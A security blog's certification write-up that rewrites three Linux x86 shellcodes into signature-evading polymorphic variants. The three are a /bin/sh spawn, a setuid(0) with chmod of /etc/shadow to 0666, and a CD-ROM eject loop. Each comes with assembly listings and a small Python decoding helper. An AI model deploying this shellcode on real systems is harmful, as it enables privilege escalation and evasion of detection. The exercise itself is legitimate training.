SLAE – Assignment #6: Polymorphic Shellcode
Posted by: voidsec
Post Date: April 2, 2020
Assignment #6: Polymorphic Shellcode
The sixth SLAE assignment requires creating a polymorphic version of three different shellcodes published on Shell-Storm: each variant must keep the original behaviour while changing the instruction sequence (and therefore the byte pattern), staying within 150% of the original size.
I decided to work on these three:
- http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes
- http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes
- http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) – 39 bytes
As always, all the code is also available on GitHub.
Stay updated, join VoidSec’s Telegram Channel: https://t.me/voidsec_updates
execve (“/bin/sh”)
Original:
```nasm
; http://shell-storm.org/shellcode/files/shellcode-752.php
xor ecx, ecx
mul ecx             ; eax = edx = 0
push ecx            ; NULL terminator
push 0x68732f2f     ;; hs//
push 0x6e69622f     ;; nib/
mov ebx, esp        ; ebx -> "/bin//sh"
mov al, 11          ; execve
int 0x80
```
Polymorphic:
```nasm
; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
; mul: multiply eax value with arg (ecx), result stored in eax,edx
xor ecx, ecx
mul ecx             ; eax = edx = 0
push eax            ; NULL terminator (eax instead of ecx)
mov edi, 0x68732f2f ; "//sh"
mov esi, 0x6e69622f ; "/bin"
push edi            ; string pushed through edi/esi instead of immediates
push esi
mov ebx, esp        ; ebx -> "/bin//sh"
mov al, 0xb         ; execve
int 0x80
```
Diff:
- original size: 21 bytes
- polymorphic size: 23 bytes [OK] (max size: 31.5 bytes, i.e. 150% of the original)
- size increase: +9.52%
setuid(0) + chmod(“/etc/shadow”,0666)
Original:
```nasm
; http://shell-storm.org/shellcode/files/shellcode-624.php
xor ebx, ebx        ; uid = 0
mov al, 0x17        ; setuid
int 0x80            ; setuid(0)
xor eax, eax
push eax            ; NULL terminator
push 0x776f6461     ; "adow"
push 0x68732f63     ; "c/sh"
push 0x74652f2f     ; "//et"
mov ebx, esp        ; ebx -> "//etc/shadow"
mov cx, 0x1b6       ; mode 0666
mov al, 0xf         ; chmod
int 0x80            ; chmod("//etc/shadow", 0666)
inc eax             ; chmod returned 0 -> eax = 1 = exit
int 0x80            ; exit
```
Polymorphic:
```nasm
; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
xor ebx, ebx        ; uid = 0
push 0x17
pop eax             ; eax = setuid (push/pop instead of mov al)
int 0x80            ; setuid(0)
xor eax, eax
push eax            ; NULL terminator
mov eax, 0x776f6461 ; "adow"
push eax
mov eax, 0x68732f63 ; "c/sh"
push eax
mov eax, 0x74652f2f ; "//et"
push eax
mov ebx, esp        ; ebx -> "//etc/shadow"
mov ecx, -219       ; negative immediates avoid null bytes
add ecx, -219       ; ecx = -438 (0xfffffe4a)
neg ecx             ; ecx = 438 = 0666
mov eax, 0xffffffff
and eax, 0xf        ; eax = 15 = chmod, without a null byte in the immediate
int 0x80            ; chmod("//etc/shadow", 0666)
inc eax             ; chmod returned 0 -> eax = 1 = exit
int 0x80            ; exit
```
Diff:
- original size: 37 bytes
- polymorphic size: 51 bytes [OK] (max size: 55.5 bytes, i.e. 150% of the original)
- size increase: +37.83%
open cd-rom loop (follows “/dev/cdrom” symlink)
Original:
```nasm
; http://shell-storm.org/shellcode/files/shellcode-231.php
push 0x5
pop eax             ; eax = open
xor ecx, ecx
push ecx            ; NULL terminator
mov ch, 0x8         ; ecx = 0x800 = O_NONBLOCK
push 0x6d6f7264     ; "drom"
push 0x632f7665     ; "ev/c"
push 0x642f2f2f     ; "///d"
mov ebx, esp        ; ebx -> "///dev/cdrom"
int 0x80            ; open("///dev/cdrom", O_NONBLOCK)
mov ebx, eax        ; ebx = fd
mov cx, 0x5309      ; CDROMEJECT
openit:
mov al, 0x36        ; ioctl
int 0x80            ; ioctl(fd, CDROMEJECT)
jmp openit          ; loop forever
```
Polymorphic:
```nasm
; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
push 0x5
pop eax             ; eax = open
xor ecx, ecx
push ecx            ; NULL terminator
mov ch, 0x8         ; ecx = 0x800 = O_NONBLOCK
mov edi, 0x6d6f7264 ; "drom" (string goes through edi instead of push imm32)
push edi
mov edi, 0x632f7665 ; "ev/c"
push edi
mov edi, 0x642f2f2f ; "///d"
push edi
mov ebx, esp        ; ebx -> "///dev/cdrom"
int 0x80            ; open("///dev/cdrom", O_NONBLOCK)
xchg eax, ebx       ; ebx = fd (xchg instead of mov)
mov cx, 0x5309      ; CDROMEJECT
openit:
push 0x36
pop eax             ; eax = ioctl (push/pop instead of mov al)
int 0x80            ; ioctl(fd, CDROMEJECT)
jmp openit          ; loop forever
```
Diff:
- original size: 39 bytes
- polymorphic size: 42 bytes [OK] (max size: 58.5 bytes, i.e. 150% of the original)
- size increase: +7.69%
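When triaging shellcode like the three listings above, the first things an analyst recovers are the strings hidden in the pushed dwords, whether an immediate would introduce a null byte, and whether the variant stays inside the size budget. The helper below is added for this write-up (it is not part of the original post or of the Shell-Storm entries); the dword lists are the constants from the three listings, and the 32-bit wrap helper shows what `mov ecx, -219` followed by `add ecx, -219` actually leaves in the register.

```python
import struct

# Immediates pushed by each shellcode, listed in push order (first push ends up
# at the highest stack address). Values taken from the three listings.
PUSHED_STRINGS = {
    "shellcode-752": [0x68732f2f, 0x6e69622f],
    "shellcode-624": [0x776f6461, 0x68732f63, 0x74652f2f],
    "shellcode-231": [0x6d6f7264, 0x632f7665, 0x642f2f2f],
}


def decode_pushed_string(immediates):
    """Recover the NUL-terminated string a shellcode builds by pushing dwords.

    The stack grows down, so the last dword pushed sits at the lowest address
    and is the start of the string; each dword is stored little-endian.
    """
    raw = b"".join(struct.pack("<I", imm) for imm in reversed(immediates))
    return raw.decode("ascii")


def reg32(value):
    """Contents of a 32-bit register holding `value` (two's complement wrap)."""
    return value & 0xffffffff


def has_null_byte(imm):
    """True if a 32-bit immediate would put a 0x00 byte into the shellcode."""
    return b"\x00" in struct.pack("<I", reg32(imm))


def size_delta(original_len, poly_len, max_ratio=1.5):
    """Growth of the polymorphic version and whether it stays within the cap.

    Returns (max_allowed_bytes, percent_growth, within_cap). The assignment
    allows at most 150% of the original size.
    """
    max_allowed = original_len * max_ratio
    growth = round((poly_len - original_len) / original_len * 100, 2)
    return max_allowed, growth, poly_len <= max_allowed


if __name__ == "__main__":
    for name, dwords in PUSHED_STRINGS.items():
        print(name, decode_pushed_string(dwords))
    print(hex(reg32(-219 + -219)))          # value after the two adds
    print(hex(reg32(-reg32(-219 + -219))))  # value after neg ecx
```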
SLAE Exam Statement
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE-1511